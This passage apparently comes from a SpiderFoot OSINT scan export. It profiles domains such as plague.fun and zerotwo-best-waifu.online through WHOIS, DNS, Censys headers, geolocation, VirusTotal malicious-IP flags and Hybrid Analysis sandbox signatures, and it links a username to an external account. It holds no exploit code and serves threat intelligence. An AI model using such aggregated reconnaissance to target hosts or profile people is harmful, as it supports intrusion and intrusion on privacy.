HTTP/1.1\nAccept: */*\nReferer: https://0006352.841600.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://0006352.841600.repl.co\nAccept-Encoding: gzip, deflate\nHost: 0006352.841600.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /fonts/iconic/fonts/Material-Design-Iconic-Font.woff?v=2.2.0 HTTP/1.1\nAccept: */*\nReferer: https://0006352.841600.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nOrigin: https://0006352.841600.repl.co\nAccept-Encoding: gzip, deflate\nHost: 0006352.841600.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: 0006352.841600.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: 0006352.841600.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.149.204.188:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar2669.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar2648.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "W1808R3T.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\W1808R3T.txt]- [targetUID: 00000000-00003252]\n Dropped file: "5QJZ41ED.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\5QJZ41ED.txt]- [targetUID: 00000000-00002792]\n Dropped file: "TGPNUNWJ.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\TGPNUNWJ.txt]- [targetUID: 00000000-00003252]'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_lev 2022-12-18 00:21:02 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77b1ee0fdd422c1d-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 104.21.28.240 2022-12-18 00:04:47 Raw Data from RIRs No Maltiverse 3 0 2 0 None {u'asn_registry': u'arin', u'country_code': u'US', u'classification': u'whitelist', u'asn_country_code': u'US', u'is_open_proxy': False, u'creation_time': u'2022-06-23 00:42:25', u'asn_date': u'2015-02-25 00:00:00', u'tag': [u'phishing'], u'postal_code': u'94107', u'is_mining_pool': False, u'ip_addr': u'172.67.137.37', u'number_of_offline_malicious_urls_allocated': 0, u'registrant_name': u'Cloudflare, Inc.', u'city': u'San Francisco', u'last_updated': u'2021-05-26 00:00:00', u'number_of_online_malicious_urls_allocated': 0, u'number_of_whitelisted_domains_resolving': 0, u'state': u'CA', u'is_known_scanner': False, u'location': {u'lat': 37.751, u'lon': -97.822}, u'type': u'ip', u'email': [u'abuse@cloudflare.com', u'noc@cloudflare.com', u'rir@cloudflare.com'], u'is_cnc': False, u'is_iot_threat': False, u'is_known_attacker': False, u'blacklist': [{u'count': 1, u'description': u'Phishing', u'labels': [u'compromised'], u'source': u'OpenPhish', u'first_seen': u'2022-06-23 00:42:25', u'last_seen': u'2022-06-24 12:40:18'}], u'modification_time': u'2022-10-03 13:47:50', u'asn_cidr': u'172.67.128.0/20', u'number_of_domains_resolving': 0, u'is_tor_node': False, u'address': u'101 Townsend Street', u'cidr': [u'172.64.0.0/13'], u'number_of_blacklisted_domains_resolving': 0, u'is_distributing_malware': False, u'is_sinkhole': False, u'is_hosting': False, u'is_cdn': True, u'as_name': u'AS13335 - Cloudflare, Inc.', u'is_vpn_node': False} 172.67.137.37 2022-12-18 00:20:36 Raw Data from RIRs No Censys 0 0 1 0 None {"last_updated_at": "2022-11-17T13:21:29.012Z", "ip": "137.117.157.128", "location_updated_at": "2022-12-18T00:20:33.438254Z", "autonomous_system_updated_at": "2022-12-18T00:20:33.438254Z", "location": {"province": "North Holland", "city": "Amsterdam", "country": "Netherlands", "coordinates": {"latitude": 52.3759, "longitude": 4.8975}, "registered_country": "United States", "registered_country_code": "US", "postal_code": "1012", "country_code": "NL", "timezone": "Europe/Amsterdam", "continent": "Europe"}, "services": [], "autonomous_system": {"bgp_prefix": "137.117.0.0/16", "country_code": "US", "asn": 8075, "name": "MICROSOFT-CORP-MSN-AS-BLOCK", "description": "MICROSOFT-CORP-MSN-AS-BLOCK"}} 137.117.157.128 2022-12-18 00:05:16 Account on External Site No Account Finder 0 0 2 0 None tradingview (Category: finance) https://www.tradingview.com/u/rasputain/ rasputain 2022-12-18 00:09:53 Co-Hosted Site No HackerTarget 0 0 2 0 None brilliantposts.com 172.67.147.230 2022-12-18 00:21:30 Open TCP Port No Censys 0 0 2 0 None 172.67.190.129:8880 172.67.190.129 2022-12-18 00:05:38 Internet Name - Unresolved No Certificate Transparency 0 0 1 0 None www.plague.fun plague.fun 2022-12-18 00:25:45 Affiliate - Domain Name No DNS Resolver 2 0 5 0 None dominiando.us ns.dominiando.us 2022-12-18 00:21:23 Netblock IPv6 Membership No Censys 0 0 2 0 None 2606:4700:3032::/48 2606:4700:3032::ac43:be81 2022-12-18 00:21:17 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["77b0cd4c299e2d49-ORD"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Date": [""]} 188.114.96.1 2022-12-18 00:21:37 Open TCP Port No Censys 0 0 2 0 None 20.226.83.185:80 20.226.83.185 2022-12-18 00:34:26 Malicious Affiliate IP Address Yes VirusTotal 0 0 3 0 None VirusTotal [81.88.52.230] https://www.virustotal.com/en/ip-address/81.88.52.230/information/ 81.88.52.230 2022-12-18 00:22:14 Open TCP Port No Censys 0 0 2 0 None 172.67.169.215:80 172.67.169.215 2022-12-18 00:02:54 Domain Whois No Whois 8 0 1 0 None Domain Name: ZEROTWO-BEST-WAIFU.ONLINE Registry Domain ID: D266274377-CNIC Registrar WHOIS Server: whois.enom.com Registrar URL: https://www.enom.com/ Updated Date: 2022-01-11T15:03:40.0Z Creation Date: 2021-12-25T22:42:25.0Z Registry Expiry Date: 2022-12-25T23:59:59.0Z Registrar: eNom, Inc. Registrar IANA ID: 48 Domain Status: ok https://icann.org/epp#ok Registrant Organization: Data Protected Registrant State/Province: WA Registrant Country: US Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: NS1.AMENWORLD.COM Name Server: NS2.AMENWORLD.COM DNSSEC: unsigned Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registrar Abuse Contact Email: domainabuse@tucows.com Registrar Abuse Contact Phone: +49.2283296859 URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:02:53.0Z <<< For more information on Whois status codes, please visit https://icann.org/epp >>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit https://www.centralnic.com/support/rdap <<< The Whois and RDAP services are provided by CentralNic, and contain information pertaining to Internet domain names registered by our our customers. By using this service you are agreeing (1) not to use any information presented here for any purpose other than determining ownership of domain names, (2) not to store or reproduce this data in any way, (3) not to use any high-volume, automated, electronic processes to obtain data from this service. Abuse of this service is monitored and actions in contravention of these terms will result in being permanently blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com) Access to the Whois and RDAP services is rate limited. For more information, visit https://registrar-console.centralnic.com/pub/whois_guidance. Domain Name: zerotwo-best-waifu.online Registry Domain ID: D266274377-CNIC Registrar WHOIS Server: WHOIS.ENOM.COM Registrar URL: WWW.ENOM.COM Updated Date: 2022-01-11T15:03:40.00Z Creation Date: 2021-12-25T22:42:00.00Z Registrar Registration Expiration Date: 2022-12-25T23:59:59.00Z Registrar: ENOM, INC. Registrar IANA ID: 48 Domain Status: ok https://www.icann.org/epp#ok Registrant Name: REDACTED FOR PRIVACY Registrant Organization: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant Street: Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Paris Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: FR Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: Registrant Fax: REDACTED FOR PRIVACY Registrant Email: https://tieredaccess.com/contact/0b66922f-87a6-44e9-a979-1158d3dacd13 Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: Admin Fax: REDACTED FOR PRIVACY Admin Email: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: Tech Fax: REDACTED FOR PRIVACY Tech Email: REDACTED FOR PRIVACY Name Server: NS1.AMENWORLD.COM Name Server: NS2.AMENWORLD.COM DNSSEC: unsigned Registrar Abuse Contact Email: ABUSE@ENOM.COM Registrar Abuse Contact Phone: +1.4259744689 URL of the ICANN WHOIS Data Problem Reporting System: HTTP://WDPRS.INTERNIC.NET/ >>> Last update of WHOIS database: 2022-12-18T00:02:53.00Z <<< For more information on Whois status codes, please visit https://icann.org/epp The data in this whois database is provided to you for information purposes only, that is, to assist you in obtaining information about or related to a domain name registration record. We make this information available "as is," and do not guarantee its accuracy. By submitting a whois query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to: (1) enable high volume, automated, electronic processes that stress or load this whois database system providing you this information; or (2) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone. The compilation, repackaging, dissemination or other use of this data is expressly prohibited without prior written consent from us. We reserve the right to modify these terms at any time. By submitting this query, you agree to abide by these terms. Version 6.3 4/3/2002 zerotwo-best-waifu.online 2022-12-18 00:24:59 Malicious IP Address Yes VirusTotal 0 0 2 0 None VirusTotal [172.67.169.215] https://www.virustotal.com/en/ip-address/172.67.169.215/information/ 172.67.169.215 2022-12-18 00:31:45 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.online plague.fun 2022-12-18 00:21:44 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["77b2ce246b792a2d-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 2606:4700:3031::6815:7b3 2022-12-18 00:04:28 Raw DNS Records No DNS Raw Records 0 0 1 0 None zerotwo-best-waifu.online. 900 IN NS ns2.amenworld.com. zerotwo-best-waifu.online. 900 IN NS ns1.amenworld.com. zerotwo-best-waifu.online 2022-12-18 00:21:34 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77a80b748c0503fc-ORD Content-Encoding: gzip 104.21.19.243 2022-12-18 00:22:11 Raw Data from RIRs No Censys 0 0 2 0 None {"last_updated_at": "2022-07-16T13:05:15.855Z", "ip": "81.88.52.232", "location_updated_at": "2022-12-18T00:22:08.060556Z", "autonomous_system_updated_at": "2022-12-18T00:22:08.060556Z", "location": {"country": "Italy", "coordinates": {"latitude": 43.1479, "longitude": 12.1097}, "registered_country": "Italy", "registered_country_code": "IT", "postal_code": "", "country_code": "IT", "timezone": "Europe/Rome", "continent": "Europe"}, "services": [], "autonomous_system": {"bgp_prefix": "81.88.48.0/20", "country_code": "IT", "asn": 39729, "name": "REGISTER-AS", "description": "REGISTER-AS"}} 81.88.52.232 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None InterSolar (Net ID: 00:00:00:00:83:B5) 37.7803446,-122.3906132 2022-12-18 00:25:06 Affiliate - IP Address No DNS Look-aside 1 0 3 0 None 81.88.48.111 81.88.48.101 2022-12-18 00:03:33 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None lhcp3236.webapps.net 81.88.52.236 2022-12-18 00:02:50 IP Address No Mnemonic PassiveDNS 13 0 1 0 None 20.226.56.97 misogyny.wtf 2022-12-18 00:12:19 Raw Data from RIRs No ipapi.co 0 0 2 0 None {u'region_code': u'ON', u'country_tld': u'.ca', u'ip': u'172.67.190.129', u'currency_name': u'Dollar', u'currency': u'CAD', u'country_population': 37058856, u'country_code': u'CA', u'timezone': u'America/Toronto', u'city': u'Toronto', u'network': u'172.67.128.0/17', u'languages': u'en-CA,fr-CA,iu', u'version': u'IPv4', u'latitude': 43.6227, u'in_eu': False, u'utc_offset': u'-0500', u'continent_code': u'NA', u'country_name': u'Canada', u'country_capital': u'Ottawa', u'org': u'CLOUDFLARENET', u'postal': u'M5J', u'asn': u'AS13335', u'country': u'CA', u'region': u'Ontario', u'longitude': -79.3892, u'country_calling_code': u'+1', u'country_area': 9984670.0, u'country_code_iso3': u'CAN'} 172.67.190.129 2022-12-18 00:02:48 IP Address No Mnemonic PassiveDNS 77 0 1 0 None 188.114.96.1 plague.fun 2022-12-18 00:27:23 Physical Location No MetaDefender 0 0 2 0 None Medellin, Colombia 188.114.97.9 2022-12-18 00:03:10 SSL Certificate Host Mismatch Yes SSL Certificate Analyzer 0 0 1 0 None *.webapps.net, webapps.net zerotwo-best-waifu.online 2022-12-18 00:21:20 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77aeec553a461419-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 188.114.97.1 2022-12-18 00:13:04 Search Engines Web Content No DuckDuckGo 0 0 3 0 None { "Abstract" : "Wanadoo was the Internet service provider division of Orange S.A. It operated in France, Spain, the United Kingdom, Belgium, the Netherlands, Tunisia, Algeria, Morocco, Senegal, Mauritius, Madagascar, Lebanon and Jordan. It ceased to operate as a worldwide brand on 1 June 2006, when it was rebranded as Orange. The origin of the name Wanadoo is subject to some controversy, as some maintain it came about in the late 1990s when many internet companies chose to compete by creating \"Yahoo! \"-sounding names. However, it might be that the name Wanadoo first appeared in an internal project at France T\u00e9l\u00e9com, much in line with a number of other such projects such as France Animation until 2003, Intranoo, Tatoo, Netatoo and @noo. Wanadoo was floated on the stock market on 18 July 2000. In 2000, Wanadoo also took over the major British ISP Freeserve, which had previously been part of the Dixons Group.", "AbstractSource" : "Wikipedia", "AbstractText" : "Wanadoo was the Internet service provider division of Orange S.A. It operated in France, Spain, the United Kingdom, Belgium, the Netherlands, Tunisia, Algeria, Morocco, Senegal, Mauritius, Madagascar, Lebanon and Jordan. It ceased to operate as a worldwide brand on 1 June 2006, when it was rebranded as Orange. The origin of the name Wanadoo is subject to some controversy, as some maintain it came about in the late 1990s when many internet companies chose to compete by creating \"Yahoo! \"-sounding names. However, it might be that the name Wanadoo first appeared in an internal project at France T\u00e9l\u00e9com, much in line with a number of other such projects such as France Animation until 2003, Intranoo, Tatoo, Netatoo and @noo. Wanadoo was floated on the stock market on 18 July 2000. In 2000, Wanadoo also took over the major British ISP Freeserve, which had previously been part of the Dixons Group.", "AbstractURL" : "https://en.wikipedia.org/wiki/Wanadoo", "Answer" : "", "AnswerType" : "", "Definition" : "", "DefinitionSource" : "", "DefinitionURL" : "", "Entity" : "company", "Heading" : "Wanadoo", "Image" : "/i/24eab621.png", "ImageHeight" : 37, "ImageIsLogo" : 0, "ImageWidth" : 150, "Infobox" : { "content" : [ { "data_type" : "string", "label" : "Industry", "sort_order" : "1000", "value" : "ISP provider", "wiki_order" : 0 }, { "data_type" : "string", "label" : "Fate", "sort_order" : "1001", "value" : "Rebranded to Orange on 1 June 2006", "wiki_order" : 1 }, { "data_type" : "string", "label" : "Owner", "sort_order" : "1002", "value" : "Orange S.A.", "wiki_order" : 2 }, { "data_type" : "string", "label" : "Website", "sort_order" : "1003", "value" : "www.orange.fr", "wiki_order" : 3 }, { "data_type" : "instance", "label" : "Instance of", "value" : { "entity-type" : "item", "id" : "Q4830453", "numeric-id" : 4830453 }, "wiki_order" : "207" }, { "data_type" : "instance_2", "label" : "Instance of", "value" : { "entity-type" : "item", "id" : "Q6881511", "numeric-id" : 6881511 }, "wiki_order" : "207" }, { "data_type" : "official_website", "label" : "Official Website", "value" : "http://www.orange.fr", "wiki_order" : "208" } ], "meta" : [ { "data_type" : "string", "label" : "article_title", "value" : "Wanadoo" }, { "data_type" : "string", "label" : "template_name", "value" : "infobox company" }, { "data_type" : "string", "label" : "formatting_rules", "value" : "company" } ] }, "Redirect" : "", "RelatedTopics" : [ { "FirstURL" : "https://duckduckgo.com/c/Internet_service_providers_of_France", "Icon" : { "Height" : "", "URL" : "", "Width" : "" }, "Result" : "Internet service providers of France", "Text" : "Internet service providers of France" }, { "FirstURL" : "https://duckduckgo.com/c/Orange_S.A.", "Icon" : { "Height" : "", "URL" : "", "Width" : "" }, "Result" : "Orange S.A.", "Text" : "Orange S.A." }, { "FirstURL" : "https://duckduckgo.com/c/Companies_formerly_listed_on_the_London_Stock_Exchange", "Icon" : { "Height" : "", "URL" : "", "Width" : "" }, "Result" : "Companies formerly listed on the London Stock Exchange", "Text" : "Companies formerly listed on the London Stock Exchange" } ], "Results" : [ { "FirstURL" : "https://www.orange.fr", "Icon" : { "Height" : 16, "URL" : "/i/orange.fr.ico", "Width" : 16 }, "Result" : "Official site", "Text" : "Official site" }, { "FirstURL" : "http://www.orange.fr", "Icon" : { "Height" : 16, "URL" : "/i/orange.fr.ico", "Width" : 16 }, "Result" : "Official site - Wanadoo", "Text" : "Official site - Wanadoo" } ], "Type" : "A", "meta" : { "attribution" : null, "blockgroup" : null, "created_date" : null, "description" : "Wikipedia", "designer" : null, "dev_date" : null, "dev_milestone" : "live", "developer" : [ { "name" : "DDG Team", "type" : "ddg", "url" : "http://www.duckduckhack.com" } ], "example_query" : "nikola tesla", "id" : "wikipedia_fathead", "is_stackexchange" : null, "js_callback_name" : "wikipedia", "live_date" : null, "maintainer" : { "github" : "duckduckgo" }, "name" : "Wikipedia", "perl_module" : "DDG::Fathead::Wikipedia", "producer" : null, "production_state" : "online", "repo" : "fathead", "signal_from" : "wikipedia_fathead", "src_domain" : "en.wikipedia.org", "src_id" : 1, "src_name" : "Wikipedia", "src_options" : { "directory" : "", "is_fanon" : 0, "is_mediawiki" : 1, "is_wikipedia" : 1, "language" : "en", "min_abstract_length" : "20", "skip_abstract" : 0, "skip_abstract_paren" : 0, "skip_end" : "0", "skip_icon" : 0, "skip_image_name" : 0, "skip_qr" : "", "source_skip" : "", "src_info" : "" }, "src_url" : null, "status" : "live", "tab" : "About", "topic" : [ "productivity" ], "unsafe" : 0 } } lfbn-nic-1-332-104.w90-116.abo.wanadoo.fr 2022-12-18 00:12:49 Raw Data from RIRs No ipapi.co 0 0 2 0 None {u'region_code': u'NH', u'country_tld': u'.nl', u'ip': u'188.114.97.9', u'currency_name': u'Euro', u'currency': u'EUR', u'country_population': 17231017, u'country_code': u'NL', u'timezone': u'Europe/Amsterdam', u'city': u'Amsterdam', u'network': u'188.114.96.0/22', u'languages': u'nl-NL,fy-NL', u'version': u'IPv4', u'latitude': 52.3759, u'in_eu': True, u'utc_offset': u'+0100', u'continent_code': u'EU', u'country_name': u'Netherlands', u'country_capital': u'Amsterdam', u'org': u'CLOUDFLARENET', u'postal': u'1012', u'asn': u'AS13335', u'country': u'NL', u'region': u'North Holland', u'longitude': 4.8975, u'country_calling_code': u'+31', u'country_area': 41526.0, u'country_code_iso3': u'NLD'} 188.114.97.9 2022-12-18 00:09:21 Open TCP Port No LeakIX 0 0 2 0 None 104.21.7.179:80 104.21.7.179 2022-12-18 00:22:07 Malicious Internet Name Yes Cleanbrowsing.org 0 1 2 0 None Blocked by Cleanbrowsing.org [autoconfig.zerotwo-best-waifu.online] autoconfig.zerotwo-best-waifu.online 2022-12-18 00:04:00 Physical Location No ipstack 0 0 1 0 None Brazil 4.228.83.86 2022-12-18 00:18:06 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.1:8080 188.114.97.0/24 2022-12-18 00:02:39 IP Address No SpiderFoot UI 14 0 0 0 None 40.113.112.131 plague.fun,misogyny.wtf,rasputain.fr,zerotwo-best-waifu.online,137.117.157.128,20.195.209.219,4.228.83.86,40.113.112.131,51.103.210.236,20.224.2.213 2022-12-18 00:04:24 Raw Data from RIRs No Hybrid Analysis 0 0 1 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 15, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'http://20.224.2.213/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"20.224.2.213:49742"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "Part-RU" as clean (type is "DOS executable (COM)")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:4324:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:4324:120:WilError_01"\n "Local\\SM0:3208:304:WilStaging_02"\n "Local\\SM0:3208:120:WilError_01"\n "Local\\InternetShortcutMutex"\n "Local\\SM0:4324:120:WilError_01"\n "Local\\SM0:4324:304:WilStaging_02"\n "Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\DBWinMutex"\n "DBWinMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3020:304:WilStaging_02"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-33', u'name': u'Drops executable files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\4324_607486025\\Part-RU]- [targetUID: 00000000-00004324]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset Store\\assets.db\\000003.log]- [targetUID: 00000000-00004324]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.31\\Ruleset Data]- [targetUID: 00000000-00004324]\n "90765a85-28a0-4fa7-b3ad-27a06095474a.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\90765a85-28a0-4fa7-b3ad-27a06095474a.tmp]- [targetUID: 00000000-00002116]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00004324]\n "manifest.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ZxcvbnData\\3.0.0.0\\manifest.json]- [targetUID: 00000000-00004324]\n "57d3fef7-7003-4f41-bd91-b9f4b45162dc.tmp" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\57d3fef7-7003-4f41-bd91-b9f4b45162dc.tmp]- [targetUID: 00000000-00004324]\n "21c677a6-7af7-4d14-b4e1-83980feecc50.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\21c677a6-7af7-4d14-b4e1-83980feecc50.tmp]- [targetUID: 00000000-00004324]\n "Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\4324_607486025\\Part-RU]- [targetUID: 00000000-00004324]\n "crl-set" has type "data"- Location: [%TEMP%\\4324_6077116\\crl-set]- [targetUID: 00000000-00004324]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00000256]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4324_1765292486\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00004324]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00004324]\n "Part-FR" has type "data"- Location: [%TEMP%\\4324_607486025\\Part-FR]- 